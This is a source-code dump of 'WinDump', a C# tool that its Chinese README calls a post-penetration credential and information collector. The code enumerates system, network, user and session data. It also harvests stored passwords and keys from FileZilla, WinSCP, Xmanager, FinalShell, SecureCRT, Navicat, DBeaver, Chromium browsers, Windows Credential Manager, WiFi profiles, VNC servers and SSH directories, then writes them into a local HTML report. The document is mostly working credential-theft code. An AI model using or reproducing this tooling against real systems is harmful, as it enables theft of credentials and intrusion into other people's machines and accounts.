Files.Hosts()}, 58 | {"{iis}", Files.IIS()}, 59 | {"{powershell}", Files.Powershell()}, 60 | 61 | // Directories 62 | {"{programs}", Utils.TryToHTML(Directories.Programs)}, 63 | {"{recent}", Utils.TryToHTML(Directories.Recent)}, 64 | {"{explorer}", Utils.TryToHTML(Directories.ExplorerHistory)}, 65 | {"{desktop}", Utils.TryToHTML(Directories.Desktop)}, 66 | {"{documents}", Utils.TryToHTML(Directories.Documents)}, 67 | {"{ssh}", Utils.TryToHTML(Directories.SSH)}, 68 | 69 | // Cred 70 | {"{rdp}", Utils.TryToHTML(RDP.GetRDP)}, 71 | {"{putty}", Utils.TryToHTML(Putty.GetPutty)}, 72 | {"{filezilla}", Utils.TryToHTML(FileZilla.GetFileZilla)}, 73 | {"{xmanager_session}", Utils.TryToHTML(XManager.GetSession)}, 74 | {"{xmanager_key}", Utils.TryToHTML(XManager.GetUserKey)}, 75 | {"{winscp}", Utils.TryToHTML(WinSCP.GetWinSCP)}, 76 | {"{finalshell}", Utils.TryToHTML(FinalShell.GetFinalShell)}, 77 | {"{finalshellkey}", Utils.TryToHTML(FinalShell.GetFinalShellKey)}, 78 | {"{securecrt}", Utils.TryToHTML(SecureCRT.GetSecureCRT)}, 79 | {"{navicat}", Utils.ToHTML(navicat)}, 80 | {"{navicatkey}", Utils.ToHTML(navicatkey)}, 81 | {"{dbeaver}", DBeaver.GetDBeaver()}, 82 | {"{browser}", Utils.TryToHTML(BrowserChromiumBased.GetChromiumBased)}, 83 | {"{credential}", Utils.TryToHTML(Credential.GetCred)}, 84 | {"{openvpn}", Utils.TryToHTML(OpenVPN.GetOpenVPN)}, 85 | {"{tightvnc}", Utils.TryToHTML(TightVNC.GetTightVNC)}, 86 | {"{ultravnc}", Utils.TryToHTML(UltraVNC.GetUltraVNC)}, 87 | 88 | // System 89 | {"{systeminfo}", Utils.TryToHTML(SystemInfo.GetInfo)}, 90 | {"{drive}", Utils.TryToHTML(SystemInfo.GetDrive)}, 91 | {"{product}", Utils.TryToHTML(SystemInfo.GetInstalledApp)}, 92 | }; 93 | var output = new MemoryStream(); 94 | using (var ms = new MemoryStream(Resource.index)) 95 | using (var gz = new GZipStream(ms, CompressionMode.Decompress)) 96 | { 97 | byte[] buffer = new byte[4096]; 98 | int bytesRead; 99 | while ((bytesRead = gz.Read(buffer, 0, buffer.Length)) > 0) 100 | { 101 | output.Write(buffer, 0, bytesRead); 102 | } 103 | } 104 | var sb = new StringBuilder(Encoding.UTF8.GetString(output.ToArray())); 105 | foreach (KeyValuePair item in values) 106 | { 107 | sb.Replace(item.Key, item.Value); 108 | } 109 | var data = Encoding.UTF8.GetBytes(sb.ToString()); 110 | var filename = Path.Combine(AppDomain.CurrentDomain.BaseDirectory, title + ".html.gz"); 111 | using (var fs = new FileStream(filename, FileMode.Create, FileAccess.Write, FileShare.None)) 112 | using (var gz = new GZipStream(fs, CompressionMode.Compress)) 113 | { 114 | gz.Write(data, 0, data.Length); 115 | } 116 | Environment.Exit(0); 117 | 118 | } 119 | 120 | 121 | } 122 | } 123 | -------------------------------------------------------------------------------- /Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("WinDump")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("WinDump")] 13 | [assembly: AssemblyCopyright("Copyright © 2025")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 会使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("4dc5651b-ac64-449b-bc58-620086193035")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | [assembly: AssemblyVersion("1.0.0.0")] 33 | [assembly: AssemblyFileVersion("1.0.0.0")] 34 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WinDump 2 | 3 | 后渗透信息/密码/凭证收集工具 4 | 5 | 相对于其他工具主要有以下特点 6 | 7 | 1. 报告使用html更直观 8 | 2. 增加ssh的key相关的获取 9 | 3. 不使用危险的操作 10 | 1. 不使用额外命令 11 | 2. 不使用远程注入/读写内存 12 | 4. 使用.Net Framework v2.0兼容更多系统 13 | 14 | ## 收集列表 15 | 16 | | **名称** | **描述** | **备注** | **等价命令** | 17 | |---------------------|-----------------------------|----------------------------|--------------------------------------| 18 | | Interface | 网卡信息 | | ipconfig | 19 | | Route | 路由信息 | | route print | 20 | | TCP | tcp连接信息 | | netstat -ano -p tcp | 21 | | UDP | udp连接信息 | | netstat -ano -p udp | 22 | | DNSCache | dns缓存 | win8/server2012以上支持 | ipconfig /displaydns | 23 | | WIFI | wifi信息 | 包含密码 | netsh wlan export profile key=clear | 24 | | User | 用户列表 | | | 25 | | LoggedUser | 已登录用户 | | quser | 26 | | Process | 进程信息 | | tasklist | 27 | | Service | 服务信息 | | sc queryex type= service state= all | 28 | | AV | 杀软 | | | 29 | | Start Menu Programs | 开始菜单目录 | | | 30 | | Recent Files | 最近文件目录 | | | 31 | | Explorer History | 文件管理器历史 | 包含Win+R历史、文件管理器中输出历史 | | 32 | | Desktop | 桌面目录 | | | 33 | | Documents | 文档目录 | | | 34 | | SSH | ~\.ssh目录 | 包含config文件中指向的IdentityFile | | 35 | | Hosts File | hosts文件 | | | 36 | | IIS Configuration | IIS配置文件 | | | 37 | | RDP | RDP连接历史 | 不包含密码 | | 38 | | Putty | Putty连接历史 | 不包含密码 | | 39 | | FileZilla | FileZilla站点和快速连接 | 包含密码和key | | 40 | | Xmanager | XShell/XFTP/XStart/Xmanager | 包含密码和key | | 41 | | WinSCP | WinSCP站点 | 包含密码和key | | 42 | | FinalShell | FinalShell | 包含密码和key | | 43 | | SecureCRT | SecureCRT | 包含密码和key | | 44 | | Navicat | Navicat | 包含密码和ssh隧道的密码和key | | 45 | | DBeaver | DBeaver | 包含密码和ssh隧道的密码 | | 46 | | Browser | 基于chrome的浏览器 | 只包含密码,不支持v20 | | 47 | | Windows Credential | windows凭据 | 包含RDP/OpenVPN等的密码 | | 48 | | OpenVPN | OpenVPN的连接配置文件 | 包含ovpn文件 | | 49 | | TightVNC | TightVNC服务端密码 | | | 50 | | UltraVNC | TightVNC服务端密码 | | | 51 | | System Information | 系统版本/内存/代理/补丁等 | | | 52 | | Drive | 驱动器 | | | 53 | | Product | 安装软件 | | | 54 | 55 | ## 截图 56 | 57 | ![windump](./windump.png) 58 | 59 | ## 相关链接 60 | 61 | 重度参考了以下项目 62 | 63 | * 64 | * 65 | * -------------------------------------------------------------------------------- /Resource.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // 此代码由工具生成。 4 | // 运行时版本:4.0.30319.42000 5 | // 6 | // 对此文件的更改可能会导致不正确的行为,并且如果 7 | // 重新生成代码,这些更改将会丢失。 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace WinDump { 12 | using System; 13 | 14 | 15 | /// 16 | /// 一个强类型的资源类,用于查找本地化的字符串等。 17 | /// 18 | // 此类是由 StronglyTypedResourceBuilder 19 | // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。 20 | // 若要添加或移除成员,请编辑 .ResX 文件,然后重新运行 ResGen 21 | // (以 /str 作为命令选项),或重新生成 VS 项目。 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resource { 26 | 27 | private static global::System.Resources.ResourceManager resourceMan; 28 | 29 | private static global::System.Globalization.CultureInfo resourceCulture; 30 | 31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 32 | internal Resource() { 33 | } 34 | 35 | /// 36 | /// 返回此类使用的缓存的 ResourceManager 实例。 37 | /// 38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 39 | internal static global::System.Resources.ResourceManager ResourceManager { 40 | get { 41 | if (object.ReferenceEquals(resourceMan, null)) { 42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("WinDump.Resource", typeof(Resource).Assembly); 43 | resourceMan = temp; 44 | } 45 | return resourceMan; 46 | } 47 | } 48 | 49 | /// 50 | /// 重写当前线程的 CurrentUICulture 属性,对 51 | /// 使用此强类型资源类的所有资源查找执行重写。 52 | /// 53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 54 | internal static global::System.Globalization.CultureInfo Culture { 55 | get { 56 | return resourceCulture; 57 | } 58 | set { 59 | resourceCulture = value; 60 | } 61 | } 62 | 63 | /// 64 | /// 查找 System.Byte[] 类型的本地化资源。 65 | /// 66 | internal static byte[] index { 67 | get { 68 | object obj = ResourceManager.GetObject("index", resourceCulture); 69 | return ((byte[])(obj)); 70 | } 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /Resource.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 122 | Resources\index.html.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 123 | 124 | -------------------------------------------------------------------------------- /Resources/index.html.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howmp/WinDump/756ef446c38719c1071b84dffe42125925a7b7ca/Resources/index.html.gz -------------------------------------------------------------------------------- /SystemInfo.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.Management; 6 | using System.Runtime.InteropServices; 7 | using System.Text; 8 | 9 | namespace WinDump 10 | { 11 | class SystemInfo 12 | { 13 | internal static DataTable GetDrive() 14 | { 15 | var dt = Utils.Query("SELECT DeviceID,VolumeName,FileSystem,Size,FreeSpace FROM Win32_LogicalDisk"); 16 | foreach (DataRow row in dt.Rows) 17 | { 18 | if (!double.TryParse(row["Size"].ToString(), out var size)) 19 | { 20 | size = 0; 21 | } 22 | if (!double.TryParse(row["FreeSpace"].ToString(), out var free)) 23 | { 24 | free = 0; 25 | } 26 | row["Size"] = string.Format("{0:0.00}G", (size / (1024.0 * 1024.0 * 1024.0))); 27 | row["FreeSpace"] = string.Format("{0:0.00}G", (free / (1024.0 * 1024.0 * 1024.0))); 28 | } 29 | return dt; 30 | } 31 | private static DataTable _cacheApps = null; 32 | internal static DataTable GetInstalledApp() 33 | { 34 | if (_cacheApps != null) 35 | { 36 | return _cacheApps; 37 | } 38 | // 检查的注册表路径列表(包括32位和64位系统) 39 | string[] registryPaths = new string[] 40 | { 41 | @"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", 42 | @"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" 43 | }; 44 | var dt = new DataTable(); 45 | dt.Columns.Add("Name"); 46 | dt.Columns.Add("Location"); 47 | dt.Columns.Add("Date"); 48 | foreach (var path in registryPaths) 49 | { 50 | using (RegistryKey key = Registry.LocalMachine.OpenSubKey(path)) 51 | { 52 | if (key == null) continue; 53 | 54 | foreach (string subkeyName in key.GetSubKeyNames()) 55 | { 56 | using (RegistryKey subkey = key.OpenSubKey(subkeyName)) 57 | { 58 | string displayName = subkey?.GetValue("DisplayName") as string; 59 | string installLocation = subkey?.GetValue("InstallLocation") as string; 60 | string date = subkey?.GetValue("InstallDate") as string; 61 | if (displayName != null) 62 | { 63 | dt.Rows.Add(displayName,installLocation,date); 64 | } 65 | } 66 | } 67 | } 68 | } 69 | _cacheApps = dt; 70 | return _cacheApps; 71 | } 72 | internal static DataTable GetInfo() 73 | { 74 | 75 | 76 | var dt = new DataTable(); 77 | dt.Columns.Add("Name"); 78 | dt.Columns.Add("Value"); 79 | dt.Rows.Add("OSVersion", GetWindowsOSName()); 80 | dt.Rows.Add("SystemDirectory", Environment.SystemDirectory); 81 | dt.Rows.Add("MachineName", Environment.MachineName); 82 | dt.Rows.Add("UserName", Environment.UserName); 83 | dt.Rows.Add("UserDomainName", Environment.UserDomainName); 84 | 85 | 86 | var mem = Memory(); 87 | if ( mem != null) 88 | { 89 | dt.Rows.Add("Memory", mem); 90 | } 91 | 92 | using (RegistryKey processorKey = Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0")) 93 | { 94 | if (processorKey != null) 95 | { 96 | dt.Rows.Add("CPU", $"{processorKey.GetValue("ProcessorNameString").ToString().Trim()} ({Environment.ProcessorCount} cores)"); 97 | } 98 | } 99 | dt.Rows.Add("Proxy", GetSystemProxy()); 100 | 101 | dt.Rows.Add("KB", GetKBFix()); 102 | return dt; 103 | 104 | 105 | } 106 | static string GetKBFix() 107 | { 108 | ManagementObjectSearcher searcher = new ManagementObjectSearcher("SELECT HotFixID FROM Win32_QuickFixEngineering"); 109 | var sb = new StringBuilder(); 110 | foreach (ManagementObject obj in searcher.Get()) 111 | { 112 | sb.AppendLine(obj["HotFixID"].ToString()); 113 | } 114 | return sb.ToString(); 115 | } 116 | static string GetWindowsOSName() 117 | { 118 | try 119 | { 120 | using (var searcher = new ManagementObjectSearcher("SELECT Caption FROM Win32_OperatingSystem")) 121 | { 122 | foreach (ManagementObject os in searcher.Get()) 123 | { 124 | return os["Caption"].ToString(); 125 | } 126 | } 127 | 128 | } 129 | catch 130 | { 131 | 132 | } 133 | return "Unknow"; 134 | 135 | } 136 | static string GetSystemProxy() 137 | { 138 | using(var key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Internet Settings",false)) 139 | { 140 | return key.GetValue("ProxyServer", "").ToString(); 141 | } 142 | } 143 | static string Memory() { 144 | MEMORYSTATUSEX memStatus = new MEMORYSTATUSEX(); 145 | if (!GlobalMemoryStatusEx(memStatus)) 146 | { 147 | return null; 148 | 149 | } 150 | double totalMemoryGB = memStatus.ullTotalPhys / (1024.0 * 1024.0 * 1024.0); 151 | double availMemoryGB = memStatus.ullAvailPhys / (1024.0 * 1024.0 * 1024.0); 152 | return string.Format("{0:0.00}G/{1:0.00}G",availMemoryGB,totalMemoryGB); 153 | } 154 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 155 | private static extern bool GlobalMemoryStatusEx([In, Out] MEMORYSTATUSEX lpBuffer); 156 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] 157 | private class MEMORYSTATUSEX 158 | { 159 | public uint dwLength; 160 | public uint dwMemoryLoad; 161 | public ulong ullTotalPhys; 162 | public ulong ullAvailPhys; 163 | public ulong ullTotalPageFile; 164 | public ulong ullAvailPageFile; 165 | public ulong ullTotalVirtual; 166 | public ulong ullAvailVirtual; 167 | public ulong ullAvailExtendedVirtual; 168 | public MEMORYSTATUSEX() 169 | { 170 | dwLength = (uint)Marshal.SizeOf(typeof(MEMORYSTATUSEX)); 171 | } 172 | } 173 | } 174 | } 175 | -------------------------------------------------------------------------------- /User.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | 7 | namespace WinDump 8 | { 9 | class User 10 | { 11 | internal static DataTable GetUser() 12 | { 13 | return Utils.Query("SELECT Name,SID,Status,Domain,LocalAccount FROM Win32_Account Where SIDType=1"); 14 | } 15 | } 16 | class QUser 17 | { 18 | [DllImport("wtsapi32.dll")] 19 | static extern IntPtr WTSOpenServer([MarshalAs(UnmanagedType.LPStr)] string pServerName); 20 | 21 | [DllImport("wtsapi32.dll")] 22 | static extern void WTSCloseServer(IntPtr hServer); 23 | 24 | [DllImport("wtsapi32.dll")] 25 | static extern Int32 WTSEnumerateSessions(IntPtr hServer, 26 | [MarshalAs(UnmanagedType.U4)] Int32 Reserved, 27 | [MarshalAs(UnmanagedType.U4)] Int32 Version, 28 | ref IntPtr ppSessionInfo, 29 | [MarshalAs(UnmanagedType.U4)] ref Int32 pCount); 30 | 31 | [DllImport("wtsapi32.dll")] 32 | static extern void WTSFreeMemory(IntPtr pMemory); 33 | 34 | [DllImport("wtsapi32.dll")] 35 | static extern bool WTSQuerySessionInformation(IntPtr hServer, 36 | int sessionId, 37 | WTS_INFO_CLASS wtsInfoClass, 38 | out IntPtr ppBuffer, 39 | out uint pBytesReturned); 40 | 41 | [StructLayout(LayoutKind.Sequential)] 42 | private struct WTS_SESSION_INFO 43 | { 44 | public Int32 SessionID; 45 | [MarshalAs(UnmanagedType.LPStr)] 46 | public string pWinStationName; 47 | public WTS_CONNECTSTATE_CLASS State; 48 | } 49 | //https://social.technet.microsoft.com/Forums/windowsserver/en-US/cbfd802c-5add-49f3-b020-c901f1a8d3f4/retrieve-user-logontime-on-terminal-service-with-remote-desktop-services-api 50 | //https://docs.microsoft.com/en-us/windows/win32/api/wtsapi32/ns-wtsapi32-wtsinfoa 51 | [StructLayout(LayoutKind.Sequential)] 52 | public struct WTSINFOA 53 | { 54 | public const int WINSTATIONNAME_LENGTH = 32; 55 | public const int DOMAIN_LENGTH = 17; 56 | public const int USERNAME_LENGTH = 20; 57 | WTS_CONNECTSTATE_CLASS State; 58 | public int SessionId; 59 | public int IncomingBytes; 60 | public int OutgoingBytes; 61 | public int IncomingFrames; 62 | public int OutgoingFrames; 63 | public int IncomingCompressedBytes; 64 | public int OutgoingCompressedBytes; 65 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = WINSTATIONNAME_LENGTH)] 66 | byte[] WinStationNameRaw; 67 | public string WinStationName 68 | { 69 | get 70 | { 71 | return Encoding.ASCII.GetString(WinStationNameRaw); 72 | } 73 | } 74 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = DOMAIN_LENGTH)] 75 | public byte[] DomainRaw; 76 | public string Domain 77 | { 78 | get 79 | { 80 | return Encoding.ASCII.GetString(DomainRaw); 81 | } 82 | } 83 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = USERNAME_LENGTH + 1)] 84 | public byte[] UserNameRaw; 85 | public string UserName 86 | { 87 | get 88 | { 89 | return Encoding.ASCII.GetString(UserNameRaw); 90 | } 91 | } 92 | public long ConnectTimeUTC; 93 | public DateTime ConnectTime 94 | { 95 | get 96 | { 97 | return DateTime.FromFileTimeUtc(ConnectTimeUTC); 98 | } 99 | } 100 | public long DisconnectTimeUTC; 101 | public DateTime DisconnectTime 102 | { 103 | get 104 | { 105 | return DateTime.FromFileTimeUtc(DisconnectTimeUTC); 106 | } 107 | } 108 | public long LastInputTimeUTC; 109 | public DateTime LastInputTime 110 | { 111 | get 112 | { 113 | return DateTime.FromFileTimeUtc(LastInputTimeUTC); 114 | } 115 | } 116 | public long LogonTimeUTC; 117 | public DateTime LogonTime 118 | { 119 | get 120 | { 121 | return DateTime.FromFileTimeUtc(LogonTimeUTC); 122 | } 123 | } 124 | public long CurrentTimeUTC; 125 | public DateTime CurrentTime 126 | { 127 | get 128 | { 129 | return DateTime.FromFileTimeUtc(CurrentTimeUTC); 130 | } 131 | } 132 | } 133 | public enum WTS_INFO_CLASS 134 | { 135 | WTSInitialProgram, 136 | WTSApplicationName, 137 | WTSWorkingDirectory, 138 | WTSOEMId, 139 | WTSSessionId, 140 | WTSUserName, 141 | WTSWinStationName, 142 | WTSDomainName, 143 | WTSConnectState, 144 | WTSClientBuildNumber, 145 | WTSClientName, 146 | WTSClientDirectory, 147 | WTSClientProductId, 148 | WTSClientHardwareId, 149 | WTSClientAddress, 150 | WTSClientDisplay, 151 | WTSClientProtocolType, 152 | WTSIdleTime, 153 | WTSLogonTime, 154 | WTSIncomingBytes, 155 | WTSOutgoingBytes, 156 | WTSIncomingFrames, 157 | WTSOutgoingFrames, 158 | WTSClientInfo, 159 | WTSSessionInfo 160 | } 161 | 162 | public enum WTS_CONNECTSTATE_CLASS 163 | { 164 | Active, 165 | Connected, 166 | ConnectQuery, 167 | Shadow, 168 | Disconnected, 169 | Idle, 170 | Listen, 171 | Reset, 172 | Down, 173 | Init 174 | } 175 | //https://stackoverflow.com/questions/32522545/retrieve-user-logontime-on-terminal-service-with-remote-desktop-services-api 176 | //https://social.technet.microsoft.com/Forums/windowsserver/en-US/cbfd802c-5add-49f3-b020-c901f1a8d3f4/retrieve-user-logontime-on-terminal-service-with-remote-desktop-services-api 177 | internal static DataTable GetQUser() 178 | { 179 | IntPtr serverHandle = WTSOpenServer(""); 180 | var dt = new DataTable(); 181 | dt.Columns.Add("UserName"); 182 | dt.Columns.Add("Domain"); 183 | dt.Columns.Add("WinStationName"); 184 | dt.Columns.Add("SessionID"); 185 | dt.Columns.Add("State"); 186 | dt.Columns.Add("Idle"); 187 | dt.Columns.Add("LoginTime"); 188 | try 189 | { 190 | IntPtr sessionInfoPtr = IntPtr.Zero; 191 | IntPtr userPtr = IntPtr.Zero; 192 | IntPtr domainPtr = IntPtr.Zero; 193 | IntPtr wtsinfoPtr = IntPtr.Zero; 194 | Int32 sessionCount = 0; 195 | //https://docs.microsoft.com/en-us/windows/win32/api/wtsapi32/nf-wtsapi32-wtsenumeratesessionsa 196 | //Retrieves a list of sessions on a Remote Desktop Session Host (RD Session Host) server. 197 | Int32 retVal = WTSEnumerateSessions(serverHandle, 0, 1, ref sessionInfoPtr, ref sessionCount); 198 | Int32 dataSize = Marshal.SizeOf(typeof(WTS_SESSION_INFO)); 199 | IntPtr currentSession = sessionInfoPtr; 200 | uint bytes = 0; 201 | 202 | 203 | if (retVal != 0) 204 | { 205 | //collect sessions - may contain duplicates 206 | for (int i = 0; i < sessionCount; i++) 207 | { 208 | WTS_SESSION_INFO si = (WTS_SESSION_INFO)Marshal.PtrToStructure(currentSession, typeof(WTS_SESSION_INFO)); 209 | currentSession = new IntPtr(currentSession.ToInt64() + dataSize); 210 | 211 | WTSQuerySessionInformation(serverHandle, si.SessionID, WTS_INFO_CLASS.WTSUserName, out userPtr, out bytes); 212 | WTSQuerySessionInformation(serverHandle, si.SessionID, WTS_INFO_CLASS.WTSDomainName, out domainPtr, out bytes); 213 | WTSQuerySessionInformation(serverHandle, si.SessionID, WTS_INFO_CLASS.WTSSessionInfo, out wtsinfoPtr, out bytes); 214 | 215 | string domain = Marshal.PtrToStringAnsi(domainPtr); 216 | string username = Marshal.PtrToStringAnsi(userPtr); 217 | 218 | var wtsinfo = (WTSINFOA)Marshal.PtrToStructure(wtsinfoPtr, typeof(WTSINFOA)); 219 | 220 | //if username is not null 221 | if (!String.IsNullOrEmpty(Marshal.PtrToStringAnsi(userPtr))) 222 | { 223 | var idle = wtsinfo.LastInputTimeUTC == 0 ? "none" : wtsinfo.LastInputTime.ToString(); 224 | dt.Rows.Add( 225 | username, 226 | domain, 227 | si.pWinStationName, 228 | si.SessionID, 229 | si.State.ToString(), 230 | idle, 231 | wtsinfo.LogonTime 232 | ); 233 | } 234 | WTSFreeMemory(userPtr); 235 | WTSFreeMemory(domainPtr); 236 | WTSFreeMemory(wtsinfoPtr); 237 | } 238 | 239 | WTSFreeMemory(sessionInfoPtr); 240 | 241 | } 242 | 243 | } 244 | finally 245 | { 246 | WTSCloseServer(serverHandle); 247 | 248 | } 249 | 250 | return dt; 251 | } 252 | } 253 | 254 | } 255 | -------------------------------------------------------------------------------- /Utils.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.IO; 6 | using System.Management; 7 | using System.Text; 8 | using System.Text.RegularExpressions; 9 | 10 | namespace WinDump 11 | { 12 | internal class Utils 13 | { 14 | public const string CIMV2 = "root\\CIMV2"; 15 | public const string StandardCimv2 = "root/StandardCimv2"; 16 | internal delegate DataTable DtCall(); 17 | internal static string TryToHTML(DtCall call) 18 | { 19 | try 20 | { 21 | return ToHTML(call()); 22 | } 23 | catch 24 | { 25 | return ""; 26 | } 27 | } 28 | internal static string ToHTML(DataTable dt) 29 | { 30 | if (dt == null) 31 | { 32 | return ""; 33 | } 34 | StringBuilder html = new StringBuilder(1024*128); 35 | 36 | // 开始表格 37 | html.Append("\n"); 38 | 39 | // 添加表头 40 | html.Append("\n \n"); 41 | foreach (DataColumn column in dt.Columns) 42 | { 43 | html.AppendFormat(" \n", column.ColumnName); 44 | } 45 | html.Append(" \n"); 46 | 47 | // 添加表体 48 | html.Append(""); 49 | foreach (DataRow row in dt.Rows) 50 | { 51 | html.Append(" \n"); 52 | foreach (DataColumn column in dt.Columns) 53 | { 54 | html.AppendFormat(" \n", row[column].ToString()); 55 | } 56 | html.Append(" \n"); 57 | } 58 | html.Append("\n"); 59 | 60 | // 结束表格 61 | html.Append("
{0}
{0}
"); 62 | return html.ToString(); 63 | } 64 | internal static byte[] FromHex(string hex) 65 | { 66 | if (hex == null) 67 | { 68 | return null; 69 | } 70 | byte[] bytes = new byte[hex.Length / 2]; 71 | for (int i = 0; i < hex.Length; i += 2) 72 | { 73 | string hexByte = hex.Substring(i, 2); 74 | bytes[i / 2] = Convert.ToByte(hexByte, 16); 75 | } 76 | return bytes; 77 | } 78 | 79 | internal static string ToHex(byte[] bytes) 80 | { 81 | StringBuilder hex = new StringBuilder(bytes.Length * 2); 82 | foreach (byte b in bytes) 83 | { 84 | hex.AppendFormat("{0:X2}", b); 85 | } 86 | return hex.ToString(); 87 | } 88 | internal static DataTable Query(string sql, string scope=CIMV2) 89 | { 90 | var dataTable = new DataTable(); 91 | var match = Regex.Match(sql, @"SELECT\s+(.*?)\s+FROM", RegexOptions.IgnoreCase); 92 | if (match.Success) 93 | { 94 | var fields = match.Groups[1].Value.Split(','); 95 | foreach (var field in fields) 96 | { 97 | dataTable.Columns.Add(field.Trim()); 98 | } 99 | } 100 | foreach (ManagementObject item in new ManagementObjectSearcher(scope, sql).Get()) 101 | { 102 | 103 | var row = dataTable.NewRow(); 104 | foreach (var f in item.Properties) 105 | { 106 | 107 | if (f.Value == null) 108 | { 109 | row[f.Name] = ""; 110 | } 111 | else if (f.IsArray ) 112 | { 113 | var values = (Array)f.Value; 114 | var sb = new StringBuilder(); 115 | foreach (var v in values) { 116 | sb.Append(v.ToString()); 117 | sb.Append(" "); 118 | } 119 | row[f.Name] = sb.ToString(); 120 | } 121 | else 122 | { 123 | row[f.Name] = f.Value; 124 | } 125 | } 126 | dataTable.Rows.Add(row); 127 | } 128 | return dataTable; 129 | } 130 | public static string GetInstalledAppPath(string appName) 131 | { 132 | // 检查的注册表路径列表(包括32位和64位系统) 133 | string[] registryPaths = new string[] 134 | { 135 | @"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", 136 | @"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" 137 | }; 138 | 139 | foreach (var path in registryPaths) 140 | { 141 | using (RegistryKey key = Registry.LocalMachine.OpenSubKey(path)) 142 | { 143 | if (key == null) continue; 144 | 145 | foreach (string subkeyName in key.GetSubKeyNames()) 146 | { 147 | using (RegistryKey subkey = key.OpenSubKey(subkeyName)) 148 | { 149 | string displayName = subkey?.GetValue("DisplayName") as string; 150 | if (displayName?.Contains(appName) == true) 151 | { 152 | return subkey.GetValue("InstallLocation") as string 153 | ?? subkey.GetValue("UninstallString") as string; 154 | } 155 | } 156 | } 157 | } 158 | } 159 | return null; // 未找到返回null 160 | } 161 | internal static string[] GetAppLocation(string name) 162 | { 163 | var dt = SystemInfo.GetInstalledApp(); 164 | var locs = new List(); 165 | foreach (DataRow row in dt.Rows) 166 | { 167 | if (row["Name"].ToString().Contains(name)) 168 | { 169 | var loc = row["Location"] as string; 170 | if (!string.IsNullOrEmpty(loc)) 171 | { 172 | locs.Add(loc); 173 | } 174 | 175 | 176 | } 177 | } 178 | return locs.ToArray(); 179 | } 180 | 181 | } 182 | 183 | internal class IniParser 184 | { 185 | private Dictionary> sections = 186 | new Dictionary>(StringComparer.OrdinalIgnoreCase); 187 | 188 | public IniParser(string filePath) 189 | { 190 | Parse(filePath); 191 | } 192 | 193 | private void Parse(string filePath) 194 | { 195 | string currentSection = null; 196 | 197 | foreach (string line in File.ReadAllLines(filePath)) 198 | { 199 | string trimmedLine = line.Trim(); 200 | 201 | // 跳过空行 202 | if (string.IsNullOrEmpty(trimmedLine)) 203 | continue; 204 | 205 | // 处理节 206 | if (trimmedLine.StartsWith("[") && trimmedLine.EndsWith("]")) 207 | { 208 | currentSection = 